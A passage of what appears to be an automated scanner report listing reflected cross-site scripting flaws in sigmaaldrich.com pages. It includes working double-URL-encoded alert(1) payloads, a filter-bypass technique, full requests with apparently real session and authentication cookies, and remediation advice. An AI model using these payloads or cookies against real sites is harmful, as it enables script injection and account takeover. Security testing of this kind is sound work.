Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd1270";alert(1)//72a6bae4e31/areas-of-interest/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.123. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e30da%2522%253balert%25281%2529%252f%252f329cab1f52b was submitted in the REST URL parameter 3. This input was echoed as e30da";alert(1)//329cab1f52b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-intereste30da%2522%253balert%25281%2529%252f%252f329cab1f52b/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-intereste30da";alert(1)//329cab1f52b/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.124. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3856b%2522%253balert%25281%2529%252f%252f49ce609ccd7 was submitted in the REST URL parameter 4. This input was echoed as 3856b";alert(1)//49ce609ccd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science3856b%2522%253balert%25281%2529%252f%252f49ce609ccd7/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science3856b";alert(1)//49ce609ccd7/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.125. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75418%2522%253balert%25281%2529%252f%252f03a73ef7977 was submitted in the REST URL parameter 5. This input was echoed as 75418";alert(1)//03a73ef7977 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics75418%2522%253balert%25281%2529%252f%252f03a73ef7977 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics75418";alert(1)//03a73ef7977","E404") ;
   </script>
...[SNIP]...

1.126. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7714e%2522%253balert%25281%2529%252f%252f236e942502 was submitted in the REST URL parameter 1. This input was echoed as 7714e";alert(1)//236e942502 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content7714e%2522%253balert%25281%2529%252f%252f236e942502/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28998
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content7714e";alert(1)//236e942502/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.127. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33a1%2522%253balert%25281%2529%252f%252f8c3c0427d0e was submitted in the REST URL parameter 2. This input was echoed as b33a1";alert(1)//8c3c0427d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichb33a1%2522%253balert%25281%2529%252f%252f8c3c0427d0e/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
